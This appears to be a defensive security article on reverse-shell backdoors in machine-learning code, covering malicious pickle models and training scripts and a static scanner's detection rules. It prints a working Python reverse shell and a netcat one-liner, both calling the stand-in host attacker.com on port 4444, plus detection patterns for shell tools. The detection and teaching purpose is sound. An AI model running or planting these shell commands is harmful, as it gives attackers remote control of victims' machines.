
Reverse Shell Detection: Finding Backdoors in ML Code

The "Phone Home" Attack

A Reverse Shell is a technique where a compromised machine initiates an outbound connection to the attacker's server and attaches a command interpreter to it. This bypasses inbound firewall rules, which usually block unsolicited incoming connections but allow outgoing traffic (package installs, model downloads, telemetry), so the attacker's listener only ever sees a connection that the victim itself opened.

In the AI world, reverse shells are often embedded in:

  1. Pickle Models: A __reduce__ payload makes pickle.load call os.system or subprocess with a Python one-liner that connects back to the attacker; the code runs the moment the weights are deserialized, before any inference happens.
  2. Training Scripts: A malicious pull request adds a harmless-looking "logging" or "metrics" helper that actually opens a shell when the training job runs.

The Anatomy of a Python Backdoor

A classic Python reverse shell looks like this (malicious code, shown for recognition only; note that every step uses the standard library, so there is no suspicious dependency to spot in requirements.txt):

import socket,subprocess,os
# 1. Open an outbound TCP connection to the attacker's listener.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker.com",4444))
# 2. Point stdin (0), stdout (1) and stderr (2) at the socket.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# 3. Spawn an interactive shell; it now reads commands from, and writes output to, the socket.
p=subprocess.call(["/bin/sh","-i"])

Or the shorter Netcat variant: os.system("nc -e /bin/sh attacker.com 4444"). The -e flag (execute a program after connecting) exists in netcat-traditional and in Nmap's ncat (also as --exec / --sh-exec) but not in the OpenBSD netcat that ships with many distributions, so its presence in a training script is a strong signal rather than a normal admin command.

Static Analysis Defense

While runtime detection (EDR, egress monitoring) is best for catching an active shell, Static Analysis can flag the code before it ever runs: at pull-request review time for scripts, and at ingest time for model files.

Veritensor looks for high-risk combinations of commands that indicate shell spawning:

  • /bin/sh or /bin/bash passed to os.system or a subprocess call.
  • Usage of socket combined with subprocess (or os.dup2 redirecting the standard file descriptors onto a socket).
  • Common tools like nc, ncat, netcat with the -e flag (or ncat's --exec / --sh-exec).

Scanning pickle-based model weights and training scripts for these patterns before they are loaded or merged is a critical step in MLSecOps; it complements, rather than replaces, egress monitoring for the connections an undetected shell would eventually make.